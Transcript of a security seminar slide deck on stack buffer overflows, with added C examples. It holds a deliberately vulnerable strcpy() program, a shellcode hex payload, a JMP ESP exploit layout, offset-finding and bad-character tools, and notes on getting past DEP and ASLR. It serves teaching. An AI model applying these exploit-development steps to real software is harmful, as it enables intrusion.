Seminar: Hacking & Security Analysis
DESCRIPTION
Seminar on security analysis and vulnerability analysis, UIN, 21 Jun 2014.
TRANSCRIPT
Hacking | Information Security Analysis
Hacking & Security Analysis
-- Build security with creativity
Danang Heriyadi ([email protected])
Hello World
Today
• Hacking Incidents
• Assets
• Vulnerability Analysis
Top 3 - Hacking in action
• Cyber Spying
• Fraud or Forgery
• Illegal Access
Cyber Spying
Fraud or Forgery
Illegal Access
How do they do it?
• Sensitive information disclosure
– Search engines (Google, Bing, Yahoo)
– Magazines
– etc.
• Social engineering attacks
– They exploit the knowledge and attitude that members of an organization have regarding the protection of its information assets.
• Vulnerabilities in your system
– The attacker exploits a vulnerability to gain access.
Google Hacking
What are you trying to protect?
• Sensitive personal data
• Your network infrastructure
• Your assets
Common Vulnerabilities
• Web
– XSS
– Database injection
– OS command injection
– Local file disclosure
– File inclusion
– Path disclosure
– CSRF
– Directory traversal
• Low-level vulnerabilities
– Stack overflow
– Heap overflow
– Integer overflow
– Memory corruption
– etc.
Buffer Overflow
• Low-level vulnerabilities (difficulty of exploitation in parentheses)
– Stack overflow (very easy)
– Integer overflow (easy)
– Heap overflow (medium)
– Memory corruption (easy - medium)
– .....
Impact of buffer overflow
• Application
– Crash and termination
– Arbitrary code execution
• Operating system
– Crash, hang, or reboot
– Arbitrary code execution
– Privilege escalation
Basic Knowledge
• CPU registers (32-bit x86)
– EAX, EBX, ECX, EDX: general-purpose registers
– ESI, EDI: source and destination index registers
– EBP: frame (base) pointer; ESP: stack pointer
– EIP: instruction pointer, the address of the next instruction to execute
Basic Knowledge
• Assembly language
– mov
– push
– pop
– shr
– jmp
– ret
Windows Memory Allocation

User-mode address space of a 32-bit Windows process as drawn on the slide, from the lowest address to the highest:
• 0x00000000: No Access
• 0x00400000: Program Image (PE header; .text, .rdata, .data, ...)
• Heap
• Stack
• Free space, which can be allocated as heap or stack for other threads
• DLL
• 0x7FFDF000: PEB
• 0x7FFE0000 - 0x7FFE1000: Shared User Page
• 0xFFFFFFFF: top of the address space
C++ for beginners

A deliberately vulnerable program: strcpy() copies argv[1] into a 128-byte stack buffer without checking its length.

```c
#include <stdio.h>
#include <string.h>

void vulnerable(char *Buffer)
{
    char stack_data[128];
    strcpy(stack_data, Buffer);   /* no bounds check: the overflow is the point of the demo */
    printf(" Contents of variable stack_data : %s ", stack_data);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    return 0;
}
```
Run it !!
Stack Allocation

The same program, followed step by step: what main(), vulnerable(), strcpy() and printf() leave on the stack, and what happens on return. Register and stack values are example values from the slides, not real addresses.

```c
#include <stdio.h>
#include <string.h>

void vulnerable(char *Buffer)
{
    char stack_data[128];
    strcpy(stack_data, Buffer);   /* no bounds check: the overflow is the point of the demo */
    printf(" Contents of variable stack_data : %s ", stack_data);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    return 0;
}
```

Stack frame of vulnerable() while strcpy() is being called (0x00000000, the top of the stack, at the top; addresses increase downward):

    ESP -> <ptr to argv[1]>          argument pushed for the call
           <space for stack_data>    128 bytes, not yet written
           Saved EBP  0x00112233     main()'s frame pointer
           Saved EIP  0x00112237     return address into main()

CPU register (example values from the slides), one step per slide:
• EIP = 0x01234567 => address of main(): execution begins in main().
• EIP = 0x01234571 => address of vulnerable(): main() calls vulnerable(). The call pushes the return address (Saved EIP), and the function prologue pushes main()'s EBP (Saved EBP).
• EIP = 0x01234585 => stack_data[128]: the prologue reserves 128 bytes of stack for the local buffer.
• EIP = 0x01234544 => address of strcpy(): vulnerable() calls strcpy(); the frame looks like the diagram above and the buffer is still empty.
• EIP = 0x01234548 => address of printf(): strcpy() has copied argv[1], here "ABCD", into stack_data. Saved EBP and Saved EIP are untouched because the input fit in the buffer.
• EIP = 0x01234552 => restore saved EIP -> EIP: vulnerable() returns. The epilogue pops Saved EBP back into EBP, and ret pops Saved EIP (0x00112237) into EIP, so execution continues in main().
• EIP = 0x01234599 => exit(0): main() returns; the frame is gone and the stack is back where it started.
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
![Page 28: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/28.jpg)
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
CPU Register (Example)• EIP = 0x012345 => address of strcpy()
<Space for stack_data>
ESP<ptr to argv[1]>
Saved EBP 0x00112233
Saved EIP 0x00112237
![Page 29: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/29.jpg)
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
414141414141414141414141414141414141414141414141414141414141414141414141
Saved EBP 0x41414141
Saved EIP 0x41414141
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
CPU Register (Example)• EIP = 0x01234548 => address of printf()
![Page 30: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/30.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
Saved EBP 0x41414141
Saved EIP 0x41414141
CPU Register (Example)• EIP = 0x41414141 => restore saved EIP -> EIP
![Page 31: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/31.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
CPU Register (Example)• EIP = 0x41414141 Access Volation when executing 0x41414141
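The two walkthroughs above (the "ABCD" run that returns cleanly and the run of 'A's that lands 0x41414141 in EIP), as an added example that is not code from the seminar: the frame the slides draw, stack_data[128] followed by Saved EBP and Saved EIP, is modelled as a flat byte array, so an unbounded strcpy()-style copy and a bounded copy can be compared without corrupting the real stack. The offsets (saved EBP at 128, saved EIP at 132) are an assumption that matches the slides' picture; a real compiler may place padding or a stack cookie between the buffer and the saved registers.

```c
/* Added example (not from the seminar slides): the frame drawn on the slides,
 * stack_data[128] followed by Saved EBP and Saved EIP, modelled as a flat byte
 * array. An unbounded strcpy()-style copy and a bounded copy are run against it
 * and the two saved slots are read back afterwards. Offsets are assumptions that
 * match the slides' picture (no padding, no stack cookie). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   128
#define OFF_EBP    BUF_SIZE           /* saved EBP directly after the buffer */
#define OFF_EIP    (BUF_SIZE + 4)     /* saved EIP (return address) after that */
#define FRAME_SIZE (BUF_SIZE + 8)

struct saved_regs {
    uint32_t ebp;
    uint32_t eip;
};

/* Fresh frame: empty buffer, example saved values from the slides. */
static void frame_init(unsigned char *frame)
{
    uint32_t ebp = 0x00112233u, eip = 0x00112237u;
    memset(frame, 0, FRAME_SIZE);
    memcpy(frame + OFF_EBP, &ebp, sizeof ebp);
    memcpy(frame + OFF_EIP, &eip, sizeof eip);
}

static struct saved_regs frame_saved(const unsigned char *frame)
{
    struct saved_regs r;
    memcpy(&r.ebp, frame + OFF_EBP, sizeof r.ebp);
    memcpy(&r.eip, frame + OFF_EIP, sizeof r.eip);
    return r;
}

/* strcpy() semantics: copy until the NUL, never looking at the destination size.
 * This is the bug on the slides; the only stop here is the end of the model. */
static void copy_like_strcpy(unsigned char *frame, const char *input)
{
    size_t n = 0;
    while (input[n] != '\0' && n < FRAME_SIZE) {
        frame[n] = (unsigned char)input[n];
        n++;
    }
}

/* The fix: copy at most BUF_SIZE - 1 bytes and always NUL-terminate. */
static void copy_bounded(unsigned char *frame, const char *input)
{
    size_t n = 0;
    while (input[n] != '\0' && n < BUF_SIZE - 1) {
        frame[n] = (unsigned char)input[n];
        n++;
    }
    frame[n] = '\0';
}

/* Run one input through either copy and return the saved slots afterwards. */
struct saved_regs run_copy(int bounded, const char *input)
{
    unsigned char frame[FRAME_SIZE];
    frame_init(frame);
    if (bounded) copy_bounded(frame, input);
    else         copy_like_strcpy(frame, input);
    return frame_saved(frame);
}

/* Same, with a constructed input of `count` 'A' (0x41) bytes, like the slides. */
struct saved_regs run_copy_a(int bounded, size_t count)
{
    char input[512];
    if (count > sizeof input - 1) count = sizeof input - 1;
    memset(input, 'A', count);
    input[count] = '\0';
    return run_copy(bounded, input);
}

int main(void)
{
    struct saved_regs ok  = run_copy(0, "ABCD");     /* fits: slots intact */
    struct saved_regs bad = run_copy_a(0, 200);      /* overflow: both slots 0x41414141 */
    struct saved_regs fix = run_copy_a(1, 200);      /* bounded copy: slots intact */
    printf("strcpy \"ABCD\"  : EBP=0x%08x EIP=0x%08x\n", ok.ebp, ok.eip);
    printf("strcpy 200 x A  : EBP=0x%08x EIP=0x%08x\n", bad.ebp, bad.eip);
    printf("bounded 200 x A : EBP=0x%08x EIP=0x%08x\n", fix.ebp, fix.eip);
    return 0;
}
```

With 128 'A's the buffer is exactly full and both slots survive; with 132 the saved EBP is gone but the return address is still intact; anything longer reaches Saved EIP, which is the crash on the slide. The bounded copy returns 0x00112233 / 0x00112237 no matter how long the input is.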
Stack Exploitation

Stack Exploitation (Stack Overflow)

Crash input (from the previous slides), 0x00000000 / top of stack at the top:

    stack_data   41 41 41 41 ...  (128 x 0x41)
    Saved EBP    0x41414141       (was 0x00112233)
    Saved EIP    0x41414141       (was 0x00112237)
    ESP ->       41 41 41 41 ...  (the remaining input; after ret, ESP points here)

Exploit input, the same overflow with the bytes chosen on purpose:

    stack_data   41 41 41 41 ...  (128 x 0x41, filler)
    Saved EBP    0x41414141       (filler)
    Saved EIP    0x80221122       <- address of a JMP ESP instruction (example value from the slide)
    ESP ->       31c031db31c931d2eb16bfea07457e50535150ffd75950684141414189e3ebeae8f0ffffff
                 48656c6c6f776f726c64   <- shellcode

When vulnerable() returns, ret pops 0x80221122 into EIP and leaves ESP pointing just past the return address, at the bytes that followed it in the input. The JMP ESP at 0x80221122 jumps to that location, so the shellcode runs. The payload on the slide ends in the ASCII bytes 48 65 6c 6c 6f 77 6f 72 6c 64, "Helloworld".
Shellcode
• A small piece of code used as the payload in the exploitation of a software vulnerability.
• Why is our shellcode not working?
– Bad characters: bytes the vulnerable input path cannot deliver. With strcpy() the first 0x00 ends the copy, so the payload must contain no NUL bytes; other input paths forbid other bytes.
– Size: the payload is bigger than the space available after the return address.
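As an added example (not from the slides), a bad-character check run over the shellcode hex printed on the "Stack Exploitation" slide. The bad-character list (0x00, because strcpy() stops copying at the first NUL) is an assumption for that delivery path; another input path would get its own list.

```c
/* Added example (not from the seminar slides): check a payload for bytes the
 * delivery path cannot carry. The payload is the shellcode hex from the
 * "Stack Exploitation" slide; the bad-character list is an assumption for a
 * strcpy()-delivered input, where 0x00 ends the copy. */
#include <stdio.h>
#include <string.h>

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a hex string into bytes; returns the byte count, or 0 on malformed input. */
size_t hex_decode(const char *hex, unsigned char *out, size_t cap)
{
    size_t n = strlen(hex), i, o = 0;
    if (n % 2) return 0;
    for (i = 0; i + 1 < n; i += 2) {
        int hi = hexval(hex[i]), lo = hexval(hex[i + 1]);
        if (hi < 0 || lo < 0 || o >= cap) return 0;
        out[o++] = (unsigned char)((hi << 4) | lo);
    }
    return o;
}

/* Count payload bytes that appear in the bad-character list; with verbose set,
 * print each hit so the offending instruction can be re-encoded. */
size_t bad_char_scan(const unsigned char *payload, size_t len,
                     const unsigned char *bad, size_t nbad, int verbose)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (payload[i] == bad[j]) {
                hits++;
                if (verbose) printf("bad char 0x%02x at offset %zu\n", payload[i], i);
                break;
            }
    return hits;
}

/* Shellcode bytes as printed on the slide (the trailing bytes spell "Helloworld"). */
static const char SLIDE_SHELLCODE_HEX[] =
    "31c031db31c931d2eb16bfea07457e50535150ffd75950684141414189e3ebeae8f0ffffff"
    "48656c6c6f776f726c64";

/* The naive way to zero EAX, "mov eax, 0" (b8 00 00 00 00): four NUL bytes that
 * strcpy() would never copy. The slide's "xor eax, eax" (31 c0) has none. */
static const char NAIVE_HEX[] = "b800000000";

/* Bad characters assumed for a strcpy()-delivered payload. */
static const unsigned char STRCPY_BAD[] = { 0x00 };

size_t slide_shellcode_len(void)
{
    unsigned char buf[64];
    return hex_decode(SLIDE_SHELLCODE_HEX, buf, sizeof buf);
}

size_t slide_shellcode_bad_chars(void)
{
    unsigned char buf[64];
    size_t n = hex_decode(SLIDE_SHELLCODE_HEX, buf, sizeof buf);
    return bad_char_scan(buf, n, STRCPY_BAD, sizeof STRCPY_BAD, 0);
}

size_t naive_bad_chars(void)
{
    unsigned char buf[16];
    size_t n = hex_decode(NAIVE_HEX, buf, sizeof buf);
    return bad_char_scan(buf, n, STRCPY_BAD, sizeof STRCPY_BAD, 0);
}

int main(void)
{
    unsigned char buf[64];
    size_t n = hex_decode(SLIDE_SHELLCODE_HEX, buf, sizeof buf);
    printf("slide shellcode: %zu bytes, %zu bad chars\n", n,
           bad_char_scan(buf, n, STRCPY_BAD, sizeof STRCPY_BAD, 1));
    n = hex_decode(NAIVE_HEX, buf, sizeof buf);
    printf("mov eax, 0     : %zu bytes, %zu bad chars\n", n,
           bad_char_scan(buf, n, STRCPY_BAD, sizeof STRCPY_BAD, 1));
    return 0;
}
```

The slide's 47-byte payload passes (its xor reg,reg idiom and short jumps are exactly how NUL bytes are avoided); the five-byte mov eax, 0 fails with four hits. The same scan answers the size question: compare the byte count with the room that exists after the return address.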
Stack Exploitation (Stack Overflow)
• Fuzzing technique
– Detect the buffer overflow
– Find the offset at which the input overwrites the EBP and EIP registers
• Find a JMP ESP
– windbg command > lm m user32  (where is user32.dll loaded?)
– windbg command > s -b 7xxxxx 7xxxxx ff e4  (search that range for the bytes ff e4, the opcode of JMP ESP)
• Generate shellcode
– msfvenom
– manually :-P
• Finish the exploit
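As an added example (not from the slides or the speaker's tooling), the "find the offset" and "find JMP ESP" steps of the procedure above in C, on constructed inputs: a Metasploit-style cyclic pattern with the lookup that maps the value found in EIP back to an input offset, and a byte scan for ff e4 that does what the windbg `s -b` line does, run here over a made-up module image instead of user32.dll.

```c
/* Added example (not from the seminar slides): C versions of the "find the offset"
 * and "find JMP ESP" steps, run on constructed inputs. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...Zz9": over its full 20280 bytes
 * every 4-byte window occurs once, so the bytes that land in EIP after a crash
 * identify one position in the input. Fills up to n bytes, returns the count. */
size_t pattern_create(char *out, size_t n)
{
    size_t i = 0;
    for (int u = 'A'; u <= 'Z'; u++)
        for (int l = 'a'; l <= 'z'; l++)
            for (int d = '0'; d <= '9'; d++) {
                char trip[3] = { (char)u, (char)l, (char)d };
                for (int k = 0; k < 3; k++) {
                    if (i >= n) return i;
                    out[i++] = trip[k];
                }
            }
    return i;
}

/* Map the value read out of EIP back to an input offset. On x86 the register holds
 * the four bytes little-endian, so 0x41346541 means the bytes "Ae4A". -1 if absent. */
long pattern_offset(uint32_t eip_value)
{
    static char pat[20280];
    size_t n = pattern_create(pat, sizeof pat);
    unsigned char needle[4] = {
        (unsigned char)eip_value,         (unsigned char)(eip_value >> 8),
        (unsigned char)(eip_value >> 16), (unsigned char)(eip_value >> 24)
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* The windbg step "s -b <start> <end> ff e4": scan a byte range for the JMP ESP
 * opcode. x86 code is not aligned, so ff e4 found inside some other instruction's
 * operand bytes works exactly as well as a JMP ESP the compiler emitted. */
long find_jmp_esp(const unsigned char *image, size_t len, size_t start_at)
{
    for (size_t i = start_at; i + 2 <= len; i++)
        if (image[i] == 0xff && image[i + 1] == 0xe4) return (long)i;
    return -1;
}

/* Crash simulation on the slides' frame (128-byte stack_data, then the 4-byte saved
 * EBP): the saved EIP receives pattern bytes 132..135, read here as the CPU would. */
uint32_t simulated_crash_eip(void)
{
    char pat[200];
    pattern_create(pat, sizeof pat);
    const unsigned char *p = (const unsigned char *)pat + 128 + 4;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Constructed "module image": NOP filler, a decoy "e4 ff" pair that must not match,
 * and one genuine ff e4 at offset 0x123. A real run would scan the bytes of user32.dll
 * at its load address (the range "lm m user32" prints) instead. */
long demo_find_jmp_esp(void)
{
    unsigned char image[0x200];
    memset(image, 0x90, sizeof image);
    image[0x100] = 0xe4; image[0x101] = 0xff;   /* decoy, reversed order */
    image[0x123] = 0xff; image[0x124] = 0xe4;   /* JMP ESP */
    return find_jmp_esp(image, sizeof image, 0);
}

int main(void)
{
    uint32_t eip = simulated_crash_eip();
    printf("EIP after crash = 0x%08x -> input offset %ld (128 buffer + 4 saved EBP)\n",
           eip, pattern_offset(eip));
    printf("JMP ESP (ff e4) at image+0x%lx\n", demo_find_jmp_esp());
    return 0;
}
```

For the slides' frame the lookup returns 132, so the exploit input is 132 bytes of filler, the 4-byte JMP ESP address, then the shellcode. The address has to come from a module that is loaded at the same base every time; on the Windows XP targets of these slides user32.dll is, which is why the windbg search is pointed at it.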
Mitigation and Technique
• Windows XP
– Hardware DEP -> ROP shellcode
• Windows Vista
– ASLR -> use a static (non-randomized) address in shared data memory
– DEP -> ROP shellcode
• Windows 7
– ASLR + DEP -> ROP / JIT ROP / JIT ROP spraying
Mitigation and Technique
• Windows 8
– ASLR + DEP (new) -> ROP / JIT ROP
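As an added example (not from the slides), a check for whether a Windows binary has opted in to the two mitigations named on these slides: the DllCharacteristics field of the PE optional header carries IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040, ASLR) and IMAGE_DLLCHARACTERISTICS_NX_COMPAT (0x0100, DEP). The PE image it parses is a constructed minimal header, not a real executable; to check a real file, read it into memory and pass the bytes to pe_dll_characteristics().

```c
/* Added example (not from the seminar slides): read the DllCharacteristics field of a
 * PE optional header to see whether a binary opts in to the two mitigations named on
 * the slides. The PE image used here is a constructed minimal header, not a real file. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DLLCHAR_DYNAMIC_BASE 0x0040   /* IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: ASLR */
#define DLLCHAR_NX_COMPAT    0x0100   /* IMAGE_DLLCHARACTERISTICS_NX_COMPAT: DEP */

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* DllCharacteristics of the image, or -1 if the bytes are not a PE we can parse.
 * Walk: "MZ" at 0, e_lfanew at 0x3c, "PE\0\0", 20-byte COFF header, then the optional
 * header (Magic 0x10b = PE32, 0x20b = PE32+); DllCharacteristics is at offset 70 of
 * the optional header in both formats. Every read is bounds-checked against len. */
int pe_dll_characteristics(const unsigned char *img, size_t len)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t pe = rd32(img + 0x3c);
    if ((uint64_t)pe + 4 + 20 + 72 > len) return -1;
    if (memcmp(img + pe, "PE\0\0", 4) != 0) return -1;
    const unsigned char *opt = img + pe + 4 + 20;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b) return -1;
    return rd16(opt + 70);
}

int pe_has_aslr(const unsigned char *img, size_t len)
{
    int c = pe_dll_characteristics(img, len);
    return c >= 0 && (c & DLLCHAR_DYNAMIC_BASE) != 0;
}

int pe_has_dep(const unsigned char *img, size_t len)
{
    int c = pe_dll_characteristics(img, len);
    return c >= 0 && (c & DLLCHAR_NX_COMPAT) != 0;
}

/* Constructed minimal PE32 header with the requested DllCharacteristics; everything
 * the parser does not look at is left zero. Returns the image size. */
size_t build_fake_pe32(unsigned char *out, size_t cap, uint16_t dllchar)
{
    const size_t pe_off = 0x80, opt_off = pe_off + 4 + 20, need = opt_off + 96;
    if (cap < need) return 0;
    memset(out, 0, need);
    out[0] = 'M'; out[1] = 'Z';
    out[0x3c] = (unsigned char)pe_off;              /* e_lfanew, little-endian */
    memcpy(out + pe_off, "PE\0\0", 4);
    out[opt_off] = 0x0b; out[opt_off + 1] = 0x01;   /* Magic 0x10b (PE32) */
    out[opt_off + 70] = (unsigned char)dllchar;
    out[opt_off + 71] = (unsigned char)(dllchar >> 8);
    return need;
}

/* Bit 1 = ASLR, bit 0 = DEP, for a fake image built with the given flags. */
int mitigation_bits(uint16_t dllchar)
{
    unsigned char img[256];
    size_t n = build_fake_pe32(img, sizeof img, dllchar);
    return (pe_has_aslr(img, n) << 1) | pe_has_dep(img, n);
}

int main(void)
{
    static const uint16_t cases[] = { 0x0000, 0x0040, 0x0100, 0x0140 };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int b = mitigation_bits(cases[i]);
        printf("DllCharacteristics=0x%04x  ASLR=%s  DEP=%s\n", cases[i],
               (b & 2) ? "yes" : "no", (b & 1) ? "yes" : "no");
    }
    return 0;
}
```

The flags are per module, which is the point of the "static address" line on the Vista slide: one DLL in the process without DYNAMIC_BASE loads at a fixed base and gives the attacker a non-randomized address, however well the main executable is built. Running this check over every module a process loads is the quickest way to find that DLL.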